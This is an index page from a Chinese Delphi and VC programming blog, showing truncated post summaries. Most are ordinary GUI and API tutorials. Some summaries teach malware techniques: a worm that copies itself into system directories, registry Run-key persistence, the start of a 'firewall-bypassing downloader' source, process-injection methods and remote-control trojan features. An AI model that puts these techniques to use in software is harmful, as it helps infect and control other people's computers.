2011年3月23日

Delphi来编写蠕虫病毒浅析(转自天极)

摘要: 一)保护模块。 一般,我们都是把自身拷贝到系统的一些目录里,比如%systemroot%。那么,我们首先要取得这些特定的目录的路径sdk里面给我们提供了一个这样的函数GetSystemDirectory :UINT GetSystemDirectory( LPTSTR lpBuffer, // 存放返回的字符串的缓冲区 UINT uSize // 上面的缓冲去的长度 ); 相关的函数还有GetWindowsDirectory可以得到%windows%的路径 得到了系统的目录后,第二步就是拷贝文件了。sdk为我们提供了一个函数copyfile :BOOL CopyFile( LPCTSTR l. 阅读全文

posted @ 2011-03-23 22:58 dekill 阅读(233) 评论(0) 推荐(0) 编辑

文本类控件属性(用法)

摘要: LabelAlignment 设置标签文字的对齐方式Transparent 设置Label 是否透明 如果为True 就可以看到label的背景了Wordwrap label文字是否自动换行editAutoselect 设置当前edit的组件获取焦点时是否将文本全部选中borderstyle 组件样式charcase 设置edit内文字的样式格式 普通 转换大写 转换小写clolor 颜色maxlength文本框最大文字长度passwordchar 输入密码显示特殊字符Readonly只读memomemo1.lines[0]:='this is first line'; 将首行 阅读全文

posted @ 2011-03-23 22:37 dekill 阅读(189) 评论(0) 推荐(0) 编辑

文件编辑(生成,删除)

摘要: 生成文件var tText: TextFile; //定义文本(类型)begin AssignFile(tText,'xiao.asp'); //生成xiao.asp Rewrite(tText); //调用 Writeln(tText,'内容');end;删除beginif FileExists('xiao.asp') then //如果文件xiao.asp存在 那么 DeleteFile('xiao.asp'); //删除文件end;生成目录beginCreateDirectory('abc',nil); // 阅读全文

posted @ 2011-03-23 22:37 dekill 阅读(218) 评论(0) 推荐(0) 编辑

猜字游戏(ScrollBar组件)

摘要: ScrollBar组件位于组件板的Standard页上,用于各类组件的滚动控制,其主要属性如下:1.主要属性(1)Kind属性Kind属性用于控制ScrollBar组件的位置状态。当Kind为True时,scroollBar组件呈水平状态,为False时呈垂直状态。(2)Postion属性Postion属性提供ScrollBar组件中滑块的位置坐标值,以实现对其他组件的滚动控制。(3)Min与Max属性Min与Max属性用于设置ScrollBar组件中位置坐标的最小与最大值。(4)SmallChange属性SmallChange属性用于设置单击ScrollBar组件两端按钮时,滚动滑块的移动. 阅读全文

posted @ 2011-03-23 22:35 dekill 阅读(250) 评论(0) 推荐(0) 编辑

time控件

摘要: procedure TForm1.Timer1Timer(Sender: TObject);beginlabel1.Caption:=inttostr(strtoint(label1.caption)+1); //转字符串(转数值())end;procedure TForm1.Timer2Timer(Sender: TObject);beginlabel2.Caption:=datetimetostr(now); //获取当前时间end;procedure TForm1.Timer3Timer(Sender: TObject);var i: hwnd;begini:=findwindow(&# 阅读全文

posted @ 2011-03-23 22:34 dekill 阅读(185) 评论(0) 推荐(0) 编辑

ShellAPI调用外部程序

摘要: 在user后添加ShellAPIShellExecute(Handle,'open','Explorer.exe','目录',nil,1); //打开目录 ShellExecute(handle,'open','程序','-s','',SW_SHOWNORMAL); //打开程序ShellExecute(handle,nil,PChar('http://dekill.ycool.com/'),nil,nil,SW_SHOWNORMAL); //超链接 阅读全文

posted @ 2011-03-23 22:33 dekill 阅读(369) 评论(0) 推荐(0) 编辑

对话框控件(记事本)

摘要: var Form1: TForm1;constdefaultfilename='无标题文档'; implementation //定义{$R *.dfm}begin //新建 richedit1.Lines.Clear; //清除所有文本 richedit1.Modified:=False;//把Modified属性设为False PathName:=DefaultFileName; Self.Caption:=DefaultFileName; //把窗口标题设为'无标题'end;beginif opendialog1.Execute then //打开Rich 阅读全文

posted @ 2011-03-23 22:33 dekill 阅读(195) 评论(0) 推荐(0) 编辑

Delphi函数类型转换

摘要: Delphi 7.0的常用函数说明函数由一句或多句代1码组成,可以实现某个特定的功能。使用函数可以使代码更加易读、易懂,加快2编程速度及减少重复代码。过程与函数类似,过程与函数最重要的区别在于,过程没有返回值,而函数能有返回值。 在Delphi 7.0中,已为我们定义好了非常多的函数,大致分类有6种:数据类型转换函数、字符串、数组操作函数3、文件、磁盘操作函数、内存、指针操作函数、数学运算函数、日期函数。在Delphi中调用函数,一般情况下可以直接使用函数即可,但由于有一些函数未包含在Uses中列出的单元中(默认单元有Windows,Messages,SysUtils,Variants,Cla 阅读全文

posted @ 2011-03-23 22:31 dekill 阅读(1207) 评论(0) 推荐(0) 编辑

注册表编辑(启动项,修改IE)

摘要: user添加registry项------------------启动项------------------var Reg :TRegistry;begin Reg := TRegistry.Create; with Reg do Try RootKey := HKEY_LOCAL_MACHINE; if OpenKey('SOFTWARE\MicroSoft\Windows\CurrentVersion\Run',false) then Reg.WriteString('delphi','c:.exe');//(启动项名,路径) Finally 阅读全文

posted @ 2011-03-23 22:28 dekill 阅读(503) 评论(0) 推荐(0) 编辑

实时的透明窗体

摘要: 添加一个TImage和TTrackBar组件,设置Form的AlphaBlend属性为Truetype加一句procedure FormCreate(Sender: TObject);//写FormCreate(初始值)procedure TForm1.FormCreate(Sender: TObject);beginself.AlphaBlend:=true;self.TrackBar1.Min:=0;self.TrackBar1.Max:=250;self.TrackBar1.Frequency:=1;end;-----------------------源码--------------- 阅读全文

posted @ 2011-03-23 22:27 dekill 阅读(145) 评论(0) 推荐(0) 编辑

3k穿墙下载者VC源代码

摘要: /* "mini_downloader" code bykardinal p.s.t compile by vc++ 6.0 can not run under win98; */ #include <windows.h>#pragma comment(lib,"user32.lib")#pragma comment(lib,"kernel32.lib")//#pragma comment(linker, "/OPT:NOWIN98") //取消这几行的注释,编译出的文件只有2K大小 //#pragma 阅读全文

posted @ 2011-03-23 18:10 dekill 阅读(306) 评论(0) 推荐(0) 编辑

[转载] 进程注入的研究与实现(五种方法)

摘要: 为了对内存中的某个进程进行操作,并且获得该进程地址空间里的数据,或者修改进程的私有数据结构,必须将自己的代码放在目标进程的地址空间里运行,这时就避免不了使用进程注入方法了。 进程注入的方法分类如下:(一)、带DLL的注入: 利用注册表注入 利用Windows Hooks注入 利用远程线程注入 利用特洛伊DLL注入 (二)、不带DLL的注入: 直接将代码写入目标进程,并启动远程线程 1. 利用注册表注入 在Windows NT/2000/XP/2003中,有一个注册表键值HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsHKEY_LOCAL_MACHINE 阅读全文

posted @ 2011-03-23 17:53 dekill 阅读(682) 评论(0) 推荐(0) 编辑

收集远控中的功能代码

摘要: 在木马中除了必需的,屏幕控制,文件管理,SHELL之外还有其它的控制方式,我们用短小精悍的程序来一一DIY一下。1.锁定鼠标:这个功能很简单只要一个ClipCursor()就可以搞定了看看下面的小程序#include <stdio.h>#include <windows.h>int main(int argc, char* argv[]){printf("\n别害怕15妙后你的鼠标就可以使用了^_^\n");RECT rect;rect.bottom=1;rect.right=1;ClipCursor(&rect);::Sleep(15000 阅读全文

posted @ 2011-03-23 17:51 dekill 阅读(209) 评论(0) 推荐(0) 编辑

WinMain WNDCLASS

摘要: Windows程序的入口函数int WINAPI WinMain( HINSTANCE hInstance, // handle to current instance HINSTANCE hPrevInstance, // handle to previous instance LPSTR lpCmdLine, // command line int nCmdShow // show state);typedef struct _WNDCLASS { UINT style; WNDPROClpfnWndProc; int cbClsExtra; int cbWndExtra; HANDLE 阅读全文

posted @ 2011-03-23 17:33 dekill 阅读(239) 评论(0) 推荐(0) 编辑